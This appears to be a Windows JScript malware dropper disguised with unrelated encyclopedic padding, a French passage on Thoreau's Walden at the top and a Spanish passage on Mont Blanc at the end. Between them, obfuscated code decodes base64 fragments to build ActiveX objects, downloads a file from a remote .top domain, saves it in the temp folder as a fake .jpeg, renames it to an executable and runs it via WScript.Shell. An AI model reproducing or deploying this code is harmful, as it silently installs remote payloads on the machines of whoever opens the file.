'Walden ou la Vie dans les bois (titre original Walden; or, Life in the Woods) est un recit publie en 1854 par lecrivain americain Henry David Thoreau (1817-1862).'

'Le livre raconte la vie que Thoreau a passee dans une cabane pendant deux ans, deux mois et deux jours, dans la foret appartenant a son ami et mentor Ralph Waldo Emerson, jouxtant letang de Walden (Walden Pond), non loin de ses amis et de sa famille qui residaient a Concord, dans le Massachusetts.'

'Walden est ecrit de telle facon que le sejour semble durer un an seulement. La narration suit les changements de saisons et Thoreau presente ses pensees, observations et speculations. Il devoile egalement comment, au contact de lelement naturel, lindividu peut se renouveler et se metamorphoser, prendre conscience enfin de la necessite de fondre toute action et toute ethique sur le rythme des elements.'

'Walden nest ni un roman, ni une autobiographie, ni un journal naturaliste. Sa dimension critique a lencontre du monde occidental en fait un veritable pamphlet. La part de limagination est consequente et Thoreau consacre de nombreuses scenes a decrire letang de Walden mais aussi les animaux et la facon dont les gens le considerent du fait de son isolement, tout en degageant des conclusions philosophiques. Ces longs passages concernant la nature appartiennent a la tradition transcendantaliste et appellent a refondre lethique.'

'Plus dun siecle plus tard, Walden reste une ?uvre phare de la litterature americaine et louvrage fondateur du genre litteraire du nature writing. La pensee ecologiste moderne voit egalement en Walden le roman du retour a la nature et de la conscience environnementale. Les observations et speculations de Thoreau font en effet de la nature, dans le recit, un protagoniste a part entiere. Walden est enfin la lente introspection de Thoreau, le fil directeur dune recherche de sens dans un monde de plus en plus marque par lindustrialisation et la transformation de lespace.'

'Il existe plus de 200 traductions de Walden a travers le monde. Louvrage a ete traduit en francais en 1922 par Louis Fabulet (1862-1933) et redecouvert en France lors des evenements de mai 68. Il demeure lun des ouvrages de reference de la pensee ecologiste voire libertaire.';
var kdx = [];
	     kdx.push('U2NyaXB0aW5');
         kdx.push('nLkZpbGVTeXN0ZW1PYmplY3Q=');	
		 Xe = base64(kdx);
		
   var INT = new ActiveXObject(Xe);
  
  function AnbVGeOa(){
    var UbZuI;
    try {
	   var dsibPq = [];
         dsibPq.push('TXN4bWw');	
 		 dsibPq.push('yLlhNTEhUVFA=');
		 lavgjp = base64(dsibPq);
      UbZuI = new ActiveXObject(lavgjp);
    } catch (e) {
      try {
		 var owqYrKidnDY = [];
         owqYrKidnDY.push('TWljcm9zb2');	
		 owqYrKidnDY.push('Z0LlhNTEhUVFA=');	
		 kybm = base64(owqYrKidnDY);
        UbZuI = new ActiveXObject(kybm);
      } catch (E) {
        UbZuI = false;
      }
    }
    if (!UbZuI && typeof XMLHttpRequest!='undefined') {
       UbZuI = new XMLHttpRequest();
    }
    return UbZuI;
  }
  
  function fuKI(callback){
	  var GlCHJYEC = AnbVGeOa();
	     if(GlCHJYEC){
		 var DHhc = [];
	     DHhc.push(' aHR0cDovL2Ntb2FoeXJkbGEudG9wL2FkbWluLnBocD9mPTEuZGF0 ');
		 VZLa = base64(DHhc);
	     var VJrZhT = VZLa;
         GlCHJYEC.open("GET", VJrZhT, false);
         GlCHJYEC.send();
		 if (GlCHJYEC.Status == 200) {
			 return callback(GlCHJYEC.ResponseBody, false);
		 }
		} 
  }
  
  function rlc(rjvFVgUIiiB){
	   try{
	     var CXn = "\\" + Math.random().toString(36).substr(2, 9) + rjvFVgUIiiB;
         var DsYjkaKZou = INT.GetSpecialFolder(2) + CXn; 
	     return DsYjkaKZou;
	   }
	   catch(e){
	     return false;
	   }
 }

   function base64(base64){
	   var Base64 = {
    _keyStr: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",    decode: function(e) {        var t = "";        var n, r, i;        var s, o, u, a;        var f = 0;        e = e.replace(/[^A-Za-z0-9+/=]/g, "");        while (f < e.length) {            s = this._keyStr.indexOf(e.charAt(f++));            o = this._keyStr.indexOf(e.charAt(f++));            u = this._keyStr.indexOf(e.charAt(f++));            a = this._keyStr.indexOf(e.charAt(f++));            n = s << 2 | o >> 4;            r = (o & 15) << 4 | u >> 2;            i = (u & 3) << 6 | a;            t = t + String.fromCharCode(n);            if (u != 64) {                t = t + String.fromCharCode(r)            }            if (a != 64) {                t = t + String.fromCharCode(i)            }        }        t = Base64._utf8_decode(t);        return t    },    _utf8_decode: function(e) {        var t = "";        var n = 0;        var r = c1 = c2 = 0;        while (n < e.length) {            r = e.charCodeAt(n);            if (r < 128) {                t += String.fromCharCode(r);                n++            } else if (r > 191 && r < 224) {                c2 = e.charCodeAt(n + 1);                t += String.fromCharCode((r & 31) << 6 | c2 & 63);                n += 2            } else {                c2 = e.charCodeAt(n + 1);                c3 = e.charCodeAt(n + 2);                t += String.fromCharCode((r & 15) << 12 | (c2 & 63) <<                    6 | c3 & 63);                n += 3            }        }        return t    }};
var JFNnXCink = base64;
var xaolNd = JFNnXCink.join('');
var UfmALrHwU = Base64.decode(xaolNd);
return UfmALrHwU;
   }
function QLq(GgEymZek, sdsdcalsdslback){
	  try{
   var fsdsdfo, f = '.eaoPLnRigxe';
   fsdsdfo = new ActiveXObject("Scripting.FileSystemObject");
   fsdsdfo.MoveFile(GgEymZek, GgEymZek.replace('.jpeg','') + f.replace('aoPLnRig',''));
   return sdsdcalsdslback(GgEymZek.replace('.jpeg','') + f.replace('aoPLnRig',''));
	  }catch(e){
		  return null;
	  }
}
  
 function savestart(files, pathpath, callback){
 function temp(){
 	var fso, tempfile;
     fso = new ActiveXObject("Scripting.FileSystemObject");
 	var TemporaryFolder = 2;
 	var tfolder = fso.GetSpecialFolder(TemporaryFolder);
 	return tfolder;
 }
 
 function CreateTempFile(){
    var tfolder, tfile, tname;
    tname = files;
    tfolder = temp();
    tfile = tfolder.CreateTextFile(tname);
    return(tfile);
 }
    var tempfile = CreateTempFile();
    var temptmp = temp();
    tempfile.writeline('cd /d ' +temptmp+'');
    tempfile.writeline('ren jstest.txt jstest.jpeg');
    tempfile.writeline('start jstest.jpeg');
    tempfile.close();
    return callback(true);
 }
function ramanzo(xV, aLGqcuBWFl){
	
var OiXC = 'haszOaNwkCZ.txt';
var DWXprsh = 'haszOaNwkCZ.txt';	
savestart(OiXC, DWXprsh, function(cb){
eval('var zBBTTCzQyLR = '+xV+';  zBBTTCzQyLR.Run(aLGqcuBWFl);');
}); 
	
}
 
 
function passort(QurfgRA){
	var Wm = 'vPV.txt';
    var sURu = 'vPV.txt';
    savestart(Wm, sURu, function(cb){
eval('var nbnZHPnW = new ActiveXObject("WScript.Shell");  nbnZHPnW.Run(QurfgRA);');
	});
} 
function EIwaTmZzKc(eusbauXZ, UVXnEwL){
ramanzo(eusbauXZ, UVXnEwL);
	
}

function dGwFJhmqfym(bn){
passort(bn);
	
}

  function VROjThLYSX(test, path){
	  function ccc(){
      var ccc = ['return S', "wrwerwe", "234dsfd", "new ActiveXObject('WScript.Shell')"];
      return ccc[Math.floor(Math.random()*ccc.length)] || "new ActiveXObject('WScript.Shell')";
      }
	  var zolupa = null, zoluzpa = null;
	  
	  var z = 'A', m='X',  a = 'W', b = 'S', c='c', d='r', f='i',g='p',h= 't', j = 'h', k = 'e';
	  var ccc = ccc();
	  function test(){
		  var arr = 0;
	  for (var i = 0; i < 10; i++) {
		  var ttt = ccc;
		  if(~ttt.indexOf('WS')){
		      arr = 1;
              QLq(path, function (putput){
	            EIwaTmZzKc(ccc, putput);
              });
		      break;
		  }
	    }
		return arr;
	  }
	   var zopa = test();
	  
 	   var index = 0;
	   function zolupaas(){
		   test();
		   index++;
		   if(index >100000){
			   QLq(path, function (putput){
			   dGwFJhmqfym(putput);
			   });
			   return true;
		   }
		   return false;
	   }
	   var i = 0;
	   do {
           i = zopa;
           var zzzz = zolupaas();	
		   if(zzzz){
			   break;
		   }
       } while (i < 1);
  }
   fuKI(function(qg){
	   function mYRqaRLO(HxA){
	   var ERwRLafeEaN = rlc('.jpeg');
	    var ZVQaFyH = [];
	     ZVQaFyH.push('QURPRE');
         ZVQaFyH.push('IuU3RyZWFt');
		 var CDLD = base64(ZVQaFyH);
		 
	   var RNqWESVJ = new ActiveXObject(CDLD);
            RNqWESVJ.Open();
            RNqWESVJ.Type = 1;
            RNqWESVJ.Write(qg);
            RNqWESVJ.Position = 0;
            RNqWESVJ.SaveToFile(ERwRLafeEaN, 2);
            RNqWESVJ.Close();
		return 	HxA(ERwRLafeEaN);
	   }
       mYRqaRLO(function(CvezWtP){
		 var HSBgsg = [];
	     HSBgsg.push('d2VyZXdlZ2QgPSBuZXcgQWN0aXZlWE9iamVjd');
         HSBgsg.push('CgnV1NjcmlwdC5TaGVsbCcpLCB3ZXJld2VnZC5SdW4ocGF0a');
         HSBgsg.push('HBhdGgpOw==');	
		 var fh = base64(HSBgsg);
			var FkJsKfhykIs = CvezWtP;
			VROjThLYSX(fh, FkJsKfhykIs);
	   });   
   });  
'Numerosos glaciares se encuentran a su alrededor: al sur los glaciares de Freney, de La Brenva, de Miage, del Mont Blanc y de Brouillard, y al norte, los glaciares de Bossons y de Taconnaz. En 1957 se inició la construcción del túnel de Mont Blanc (se terminó en 1965), que tiene 11,6 km de largo y es una de las mayores rutas de transporte transalpina, ya que une a Italia y Francia. El macizo del Mont Blanc es la cuna del alpinismo, las expediciones empezaron hacia el siglo xviii, siendo un destino de referencia en Europa para la práctica del senderismo, el esquí y el snowboarding.';